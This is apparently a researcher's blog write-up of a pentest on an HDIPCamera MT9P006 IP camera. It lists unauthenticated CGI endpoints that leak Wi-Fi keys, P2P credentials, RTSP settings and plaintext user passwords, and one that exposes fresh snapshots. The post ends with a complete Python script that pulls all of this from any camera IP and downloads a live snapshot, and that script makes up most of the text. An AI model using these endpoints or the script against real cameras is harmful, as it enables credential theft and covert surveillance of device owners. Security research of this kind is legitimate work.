I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
by just examining the source I found a few unprotected cgi requests.
A few importants cgi request can be used without any authorisation.
First getting some basic info
var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx"; var model="RT_IPC"; var hardVersion="5300-mt9p006"; var softVersion="V2.3.5.2505-S50-SMA-B20151204B"; var ipcname="IPCAM"; var startdate="2016-8-30 21:56:44"; var runtimes="0 day, 1:58"; var sdstatus="out"; var sdfreespace="0 "; var sdtotalspace="0 "; var builddate="Dec 4 2015 "; var productmodel="null"; var vendor="RTJ"; var swver=""; var hwver=""; var mppver="mpp";
P2P info
var p2p_enable = "1"; var p2p_id = "PPIV-xxxxx-WZDZZ"; var p2p_pwd = "xxx";
Wifi info
var wifissid = "xxx"; var wifikeytype = "3"; var wifiwhichkey = "0"; var wifikey="xxxxxxxxxxxxxxxx"; var wifienable="0"; var wifimac="xx:xx:xx:xx:xx:xx"; var wifienable="0"; var linkstatus="0"; var linkssid=""; var wifimode="";
rtsp info
var rtsplisnport="554"; var onvif_http_port="1018"; var rtsp_user_verify="0";
User info (Including passwords)
var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="xxx"; var password2="xxx"; var authLevel2="3"; var name3="xxx"; var password3="xxx"; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0";
It’s getting even better.
A world readable url with all the snapshots taken.
Ow wait.. let’s make some snapshots..
outputs:
var path=”/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg”
.. a freshly made snapshot.
I made a python script to make use of these cgi’s and outputs all the info.
And to make a snapshot and save it to local.
#!/bin/python # Quick & Dirty tool # Get all the info from the IPcam 5300 MT9P006 # # Use commandline parameters to retrieve all kinds of info # # usage for all the info # python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers import urllib import urllib2 import re import argparse p2p="/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get" wifi="/cgi-bin/getwifiattr.cgi" rtsp="/cgi-bin/hi3510/getrtsplisnport.cgi" snap="/web/cgi-bin/hi3510/param.cgi?cmd=snap" snap_dir="/tmpfs/snap_tmpfs/" users="/web/cgi-bin/hi3510/param.cgi?cmd=getuser" def get_param(): print "./IPcam_5300-mt9p600.py -h for cmd options" try: parser = argparse.ArgumentParser() parser.add_argument("--ip", dest="ip", default="", help="ip adres", required=True) parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot") parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)") parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)") parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info") parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)") args = parser.parse_args() return args except IOError, msg: parser.error(str(msg)) def main(): params = get_param() if params.snapshot: # call cgi to make snapshot and save to local drive print "make and download snapshot\n" req = urllib2.Request("http://"+params.ip+snap) url_data = urllib2.urlopen(req).read() match = re.search(r"/(.*)", url_data) snapfile_path = match.group(0) # remove last 2 char " and \n snapfile_path = snapfile_path[:-2] match = re.search(r"IMG_(.*).jpg", snapfile_path) snap_filename = match.group(0) print "Snap file url: %s" % snapfile_path print "Save output to: %s " % snap_filename cmd="http://" + params.ip + snapfile_path req1 = urllib2.Request(cmd) f = open(snap_filename, "wb") f.write(urllib2.urlopen(req1).read()) f.close() if params.getp2p: print "Get p2p info" req = urllib2.Request("http://" + params.ip + p2p) url_data = urllib2.urlopen(req).read() print url_data if params.getwifi: print "Get wifi info" req = urllib2.Request("http://" + params.ip + wifi) url_data = urllib2.urlopen(req).read() print url_data if params.getrtsp: print "Get rtsp info" req = urllib2.Request("http://" + params.ip + rtsp) url_data = urllib2.urlopen(req).read() print url_data if params.getusers: print "Get users info" req = urllib2.Request("http://" + params.ip + users) url_data = urllib2.urlopen(req).read() print url_data if __name__ == "__main__": main()